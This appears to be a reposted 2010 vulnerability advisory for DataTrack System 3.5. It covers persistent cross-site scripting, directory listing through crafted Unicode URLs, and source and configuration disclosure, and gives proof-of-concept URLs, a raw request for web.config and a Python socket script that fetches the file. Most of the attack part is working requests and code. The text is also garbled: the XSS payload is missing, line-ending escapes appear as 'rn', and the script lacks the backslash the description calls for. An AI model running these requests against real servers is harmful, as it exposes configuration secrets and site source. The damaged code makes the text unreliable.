# Vulnerability............Persistent Cross-Site Scripting
#
# Directory Disclosure
#
# Configuration Disclosure
#
# Source Disclosure
#
# Software.................DataTrack System 3.5
#
# Download.................http://www.magnoware.com/Downloads.aspx
#
# Date.....................5/17/10
#
#
#
#==========================================================================
==================================#
#
#
# Site.....................http://cross-site-scripting.blogspot.com/
#
# Email....................john.leitch5@gmail.com
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# User submitted data is not HTML entity encoded before it is rendered.
#
#
#
#
#
# ##Exploit##
#
#
#
# Login using the web client and submit a request with summary set to
. Navigate #
# to My History to see the result.
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# The contents of the root directory can be listed by using a specially
crafted URL. #
#
#
#
#
# ##Exploit##
#
#
#
# %u0085
#
# %u00A0
#
#
#
#
#
# ##Proof of Concept##
#
#
#
# http://localhost/%u0085/
#
# http://localhost/%u00A0/
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a
backslash to the filename. #
#
#
#
#
# ##Exploit##
#
#
#
# GET /web.config HTTP/1.1
#
# Host: localhost
#
#
#
#
#
# ##Proof of Concept##
#
#
#
import socket
host ='localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config HTTP/1.1rn'
'Host: ' + host + 'rnrn')
while 1:
response = s.recv(8192)
if not response: break
print response
References : http://securityreason.com/wlb_show/WLB-2010050112
0 comments:
Post a Comment
silahkan tinggalkan komentar anda disini .. :D